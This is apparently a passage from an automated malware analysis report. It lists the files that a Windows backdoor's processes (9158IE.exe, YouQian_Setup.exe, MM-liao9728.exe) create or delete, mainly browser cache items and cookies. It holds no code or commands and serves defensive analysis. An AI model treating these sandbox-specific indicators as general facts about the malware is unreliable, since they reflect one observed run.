%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\clock_k[1].htm (1196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\city_bottom[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\head_bg[1].png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\in_user_roomin[1].htm (1121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\icon_default[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\170029_20111122145248[1].jpg (3 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\room.9158[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120051_20130716185754[1].jpg (2743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777045_20141127144331328_255[1].jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\flashpopup[1].js (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_play1[2].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190188_m[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100093_580271_20140807153629843[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580726_20151010123808687_255[1].jpg (3900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\20150914182303281_n[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\6666002_20140805002355875_255[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_room[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\award[1].jpg (10268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\reset[1].css (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ad1_balck[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158523_20150617194246906_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@9158[1].txt (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_play1[1].png (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\200666_20150612165639[1].jpg (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170131_m[1].jpg (594 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150161_m[1].jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\180102_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130155_m[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\3_3[1].gif (1 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\index[1].css (15375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\people1[1].png (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150085_20150503121748[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\cut[1].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190256_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150002_20140419000110[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9157345_20140809011505875_255[1].jpg (3042 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\people1[1].png (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[1].jpg (2963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\170159_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777202_20150731172643031_255[1].jpg (3804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[1].jpg (6382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\200288_20140306184735[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getad4[1].htm (891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\180333_20140429150028[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\7158159_20141127041710437_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158603_20150810100123875_255[1].jpg (5567 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158827_20150730191002109_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777116_20150822141030265_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\140263_20130923154112[1].jpg (2641 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150077_20150825172310[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\HallIndex[1].js (18093 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100007_20111230175804[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\XYMarquee[1].js (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\cut[1].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\btn_room[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\ad1_balck[1].png (1667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ce0956f9-0e5f-492a-ba99-59efa187cc72[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130184_222999_20151012145103_n[1].jpg (4122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120378_20140915162837[1].jpg (1004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130065_m[1].jpg (209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100005_20111228131700[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\120058_20110117133849[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190354_20130604150927[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580296_20140829233637328_255[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\130155_20141106140816[1].jpg (2156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150022_20150910162509[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180111_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[2].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\130088_777083_20140804204648468[1].jpg (4406 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190179_9158735_20150112194135625[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fshoulie201542_n[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180128_20150704052508[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\21[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190177_m[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180004_m[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150012_20110718140241[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\130188_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158724_20150911031309265_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\9158269_20150221201553296_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158584_20150414145802593_255[1].jpg (2166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130262_20140116154840[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\170131_20141016173134[1].jpg (2640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9157426_20150921145913046_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\blockUI[1].js (4585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\reset[1].css (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777145_20150827182932546_255[2].jpg (3167 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_2[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\getad4[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777116_20150822141030265_255[1].jpg (4368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\222[1].png (5096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\hall[1].htm (915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\integrate_hall[1].htm (5882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\93223146-035d-4264-80a6-857e69f47a69[1].jpg (54716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\af090531-6168-425f-9052-0ca3f993dc90[1].jpg (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\140098_m[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580296_20140829233637328_255[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150161_20140627141901[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\140098_20131104162402[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100180_580151_20140926150329546[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_room[2].png (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158530_20150811141519171_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\rom_k_6[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100102_20150119212159[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9158596_20150623231453312_255[1].jpg (2996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158830_20150731015152343_255[1].jpg (3029 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120312_m[1].jpg (7 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777198_20151008201005109_255[1].jpg (8196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\香水[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\rom_k_2[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (471 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777145_20150827182932546_255[1].jpg (3423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\150188_20121121150649[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580123_20150505204953500_255[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\140212_20150612172425[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100076_20120504165605[1].jpg (4 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158603_20150810100123875_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158603_20150810100123875_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158603_20150810100123875_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777190_20150513200601968_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\impress_bg[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777116_20150822141030265_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\dot1[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777159_20150523182929109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\people1[1].png (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.aaa[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777045_20141127144331328_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\btn_room[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\ad1_balck[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\130188_m[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580296_20140829233637328_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777045_20141127144331328_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777198_20151008201005109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\160345_m[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_default[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\icon_default[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777045_20141127144331328_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158603_20150810100123875_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_2[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580191_20150812230520093_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580296_20140829233637328_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777116_20150822141030265_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_room[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777073_20141217193405703_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580275_20150911195526265_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777073_20141217193405703_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_play1[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[2].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777159_20150523182929109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777159_20150523182929109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\people1[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_room[2].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\people1[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777171_20141013130050828_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777116_20150822141030265_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777145_20150827182932546_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777198_20151008201005109_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[2].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777145_20150827182932546_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_play1[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_6[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777045_20141127144331328_255[1].jpg (0 bytes)

The process 9158IE.exe:2864 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777029_20151005194452656_140[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\base[1].js (11399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\btn_bg[1].png (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\weblog[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580915_20150512023501984_140[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX16.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fillet3[1].gif (317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\serial1[1].gif (362 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\view[2].htm (906 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\mini_index[1].htm (2634 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fillet_top[1].gif (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\bnt[1].gif (732 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\bnt[1].gif (1464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\getad4[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\fillet2[1].gif (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\mm_h[1].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX14.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\荧光棒[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX17.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX15.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\10_3[1].gif (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\serial1[1].gif (724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\serial1[1].gif (724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serial1[1].gif (1086 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\loading[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580956_20150823101235890_140[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\jquery[1].js (23479 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@9158[2].txt (336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\mini_index[1].js (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\xuxian[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX18.tmp (1 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\bnt[2].gif (732 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\20150914182303281[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580111_20150617204039546_140[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\bnt2[1].gif (269 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\getad4[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\bnt[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\bnt[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\serial1[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\serial1[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serial1[1].gif (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@9158[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\view[1].htm (0 bytes)

The process YouQian_Setup.exe:2228 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)

The process MM-liao9728.exe:1888 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\CALW8FHP.htm (1 bytes)
